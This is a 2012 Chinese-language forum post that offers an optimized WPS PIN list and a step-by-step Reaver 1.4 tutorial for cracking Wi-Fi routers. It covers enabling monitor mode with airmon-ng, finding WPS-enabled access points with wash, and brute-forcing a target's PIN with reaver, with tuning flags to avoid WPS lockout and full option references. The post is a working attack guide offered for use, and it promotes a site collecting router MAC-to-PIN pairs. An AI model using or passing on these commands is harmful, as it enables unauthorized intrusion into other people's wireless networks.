上等兵
- 注册时间
- 2010-3-21
- 金币
- 138 个
- 威望
- 1 个
- 荣誉
- 0 个
尚未签到
|
本帖最后由 456vv 于 2012-3-14 09:28 编辑
我不说多少分钟PJ一个PIN,4位数一万行,你知道是那一行数字是你的PIN!跟据随机数4位码出现率优化了三千行,让这个更有可能在短时间内PJ开PIN码,并增加存在“mac-pin.456vv.net”已知被PJ的PIN在前面。先破已知的PIN再破优化的PIN。
注:文件包面有带安装说明
收集PIN码
MAC to PIN Inquiry:http://mac-pin.456vv.net/
进入mac-pin.456vv.net点击“Increase you know PIN code ”可以增加你知道的MAC 和对应的PIN码。
reaver 1.4 教程
- 查看网卡加载端口
- ifconfig
- 监视网卡
- airmon-ng start wlan0
- 解压reaver文件
- tar zxvf reaver文件
- 安装reaver
- cd reaver
- ./config
- make install
- make all
- 查看支持WPS的AP
- wash -i mon0 -C
- 攻击AP
- reaver -i mon0 -b 目标APMAC地址 -a -S -n -v
- 建议增加 -d 3 -t 3参数,防止路由WPS被跑死,导致穷举中止。
- reaver -i mon0 -b 目标APMAC地址 -a -S -n -v -d 3 -t 3
- 进长保存地址
- /usr/local/etc/reaver/MAC地址.wpc
- 关机
- shutdown -q 0
复制代码
wash参数
- 必选:
- -i, --interface=<iface> 网卡接口
- -f, --file [文件1 文件2 文件3 ...] 阅读来自抓取的小包文件
- 可选:
- -c, --channel=<num> 监听频道
- -o, --out-file=<file> 对文件写数据
- -n, --probes=<num> 最大值探测发送到每个扫描的AP [15]
- -D, --daemonize 守护wash进程
- -C, --ignore-fcs 忽略错误
- -5, --5ghz 使用 5GHz 802.11 频道
- -s, --scan 使用扫描模试
- -u, --survey 使用调查 [default]
- -h, --help 显示帮助
- 例子:
- wash -i mon0
复制代码
reaver参数
- 必选参数:
- -i, --interface=<wlan> 监视模式接口使用的名称
- -b, --bssid=<mac> 目标AP的MAC
- 可选参数:
- -m, --mac=<mac> 主机网卡的MAC
- -e, --essid=<ssid> 目标AP的ESSID名称
- -c, --channel=<channel> 设置接口的802.11信道 (意味着 -f)
- -o, --out-file=<file> 输出发送到一个日志文件 [stdout]
- -s, --session=<file> 恢复以前的记录文件
- -C, --exec=<command> 所提供的命令执行成功后,pin 恢复
- -D, --daemonize 守护进程 reaver
- -a, --auto 自动检测目标AP的最先进的选项
- -f, --fixed 禁用信道跳频
- -5, --5ghz 使用5GHz的802.11信道
- -v, --verbose 显示非关键的警告(-VV更多)
- -q, --quiet 仅显示重要消息
- -h, --help 显示帮助
- 高级选项:
- -p, --pin=<wps pin> 使用指定的4个或8个的 pin WPS
- -d, --delay=<seconds> 设置pin尝试之间的延迟[1]
- -l, --lock-delay=<seconds> 设置等待的时间,如果AP锁定WPS PIN尝试[60]
- -g, --max-attempts=<num> 退出后NUM pin尝试
- -x, --fail-wait=<seconds> 设定时间后进入休眠10[0] //意外故障
- -r, --recurring-delay=<x:y> 对每一个pin码尝试Y秒
- -t, --timeout=<seconds> 设置接收超时时间[5]
- -T, --m57-timeout=<seconds> 设置M5/M7超时期[0.20]
- -A, --no-associate 不要与AP关联(协会必须由另一个应用程序进行)
- -N, --no-nacks 超时的的顺序接收数据包时,不要发送NACK消息
- -S, --dh-small 使用小DH密钥,以提高PJ速度
- -L, --ignore-locks 忽略锁定状态的目标AP
- -E, --eap-terminate 终止每一个EAP失败包WPS的记录
- -n, --nack 目标AP发送一个NACK [Auto]
- -w, --win7 模仿Windows 7的注册处处长 [False]
- 例如:
- reaver -i mon0 -b 00:90:4C:C1:AC:21 -v
复制代码
|
本帖子中包含更多资源
您需要 登录 才可以下载或查看,没有账号?注册
x
评分
-
1
查看全部评分
-
|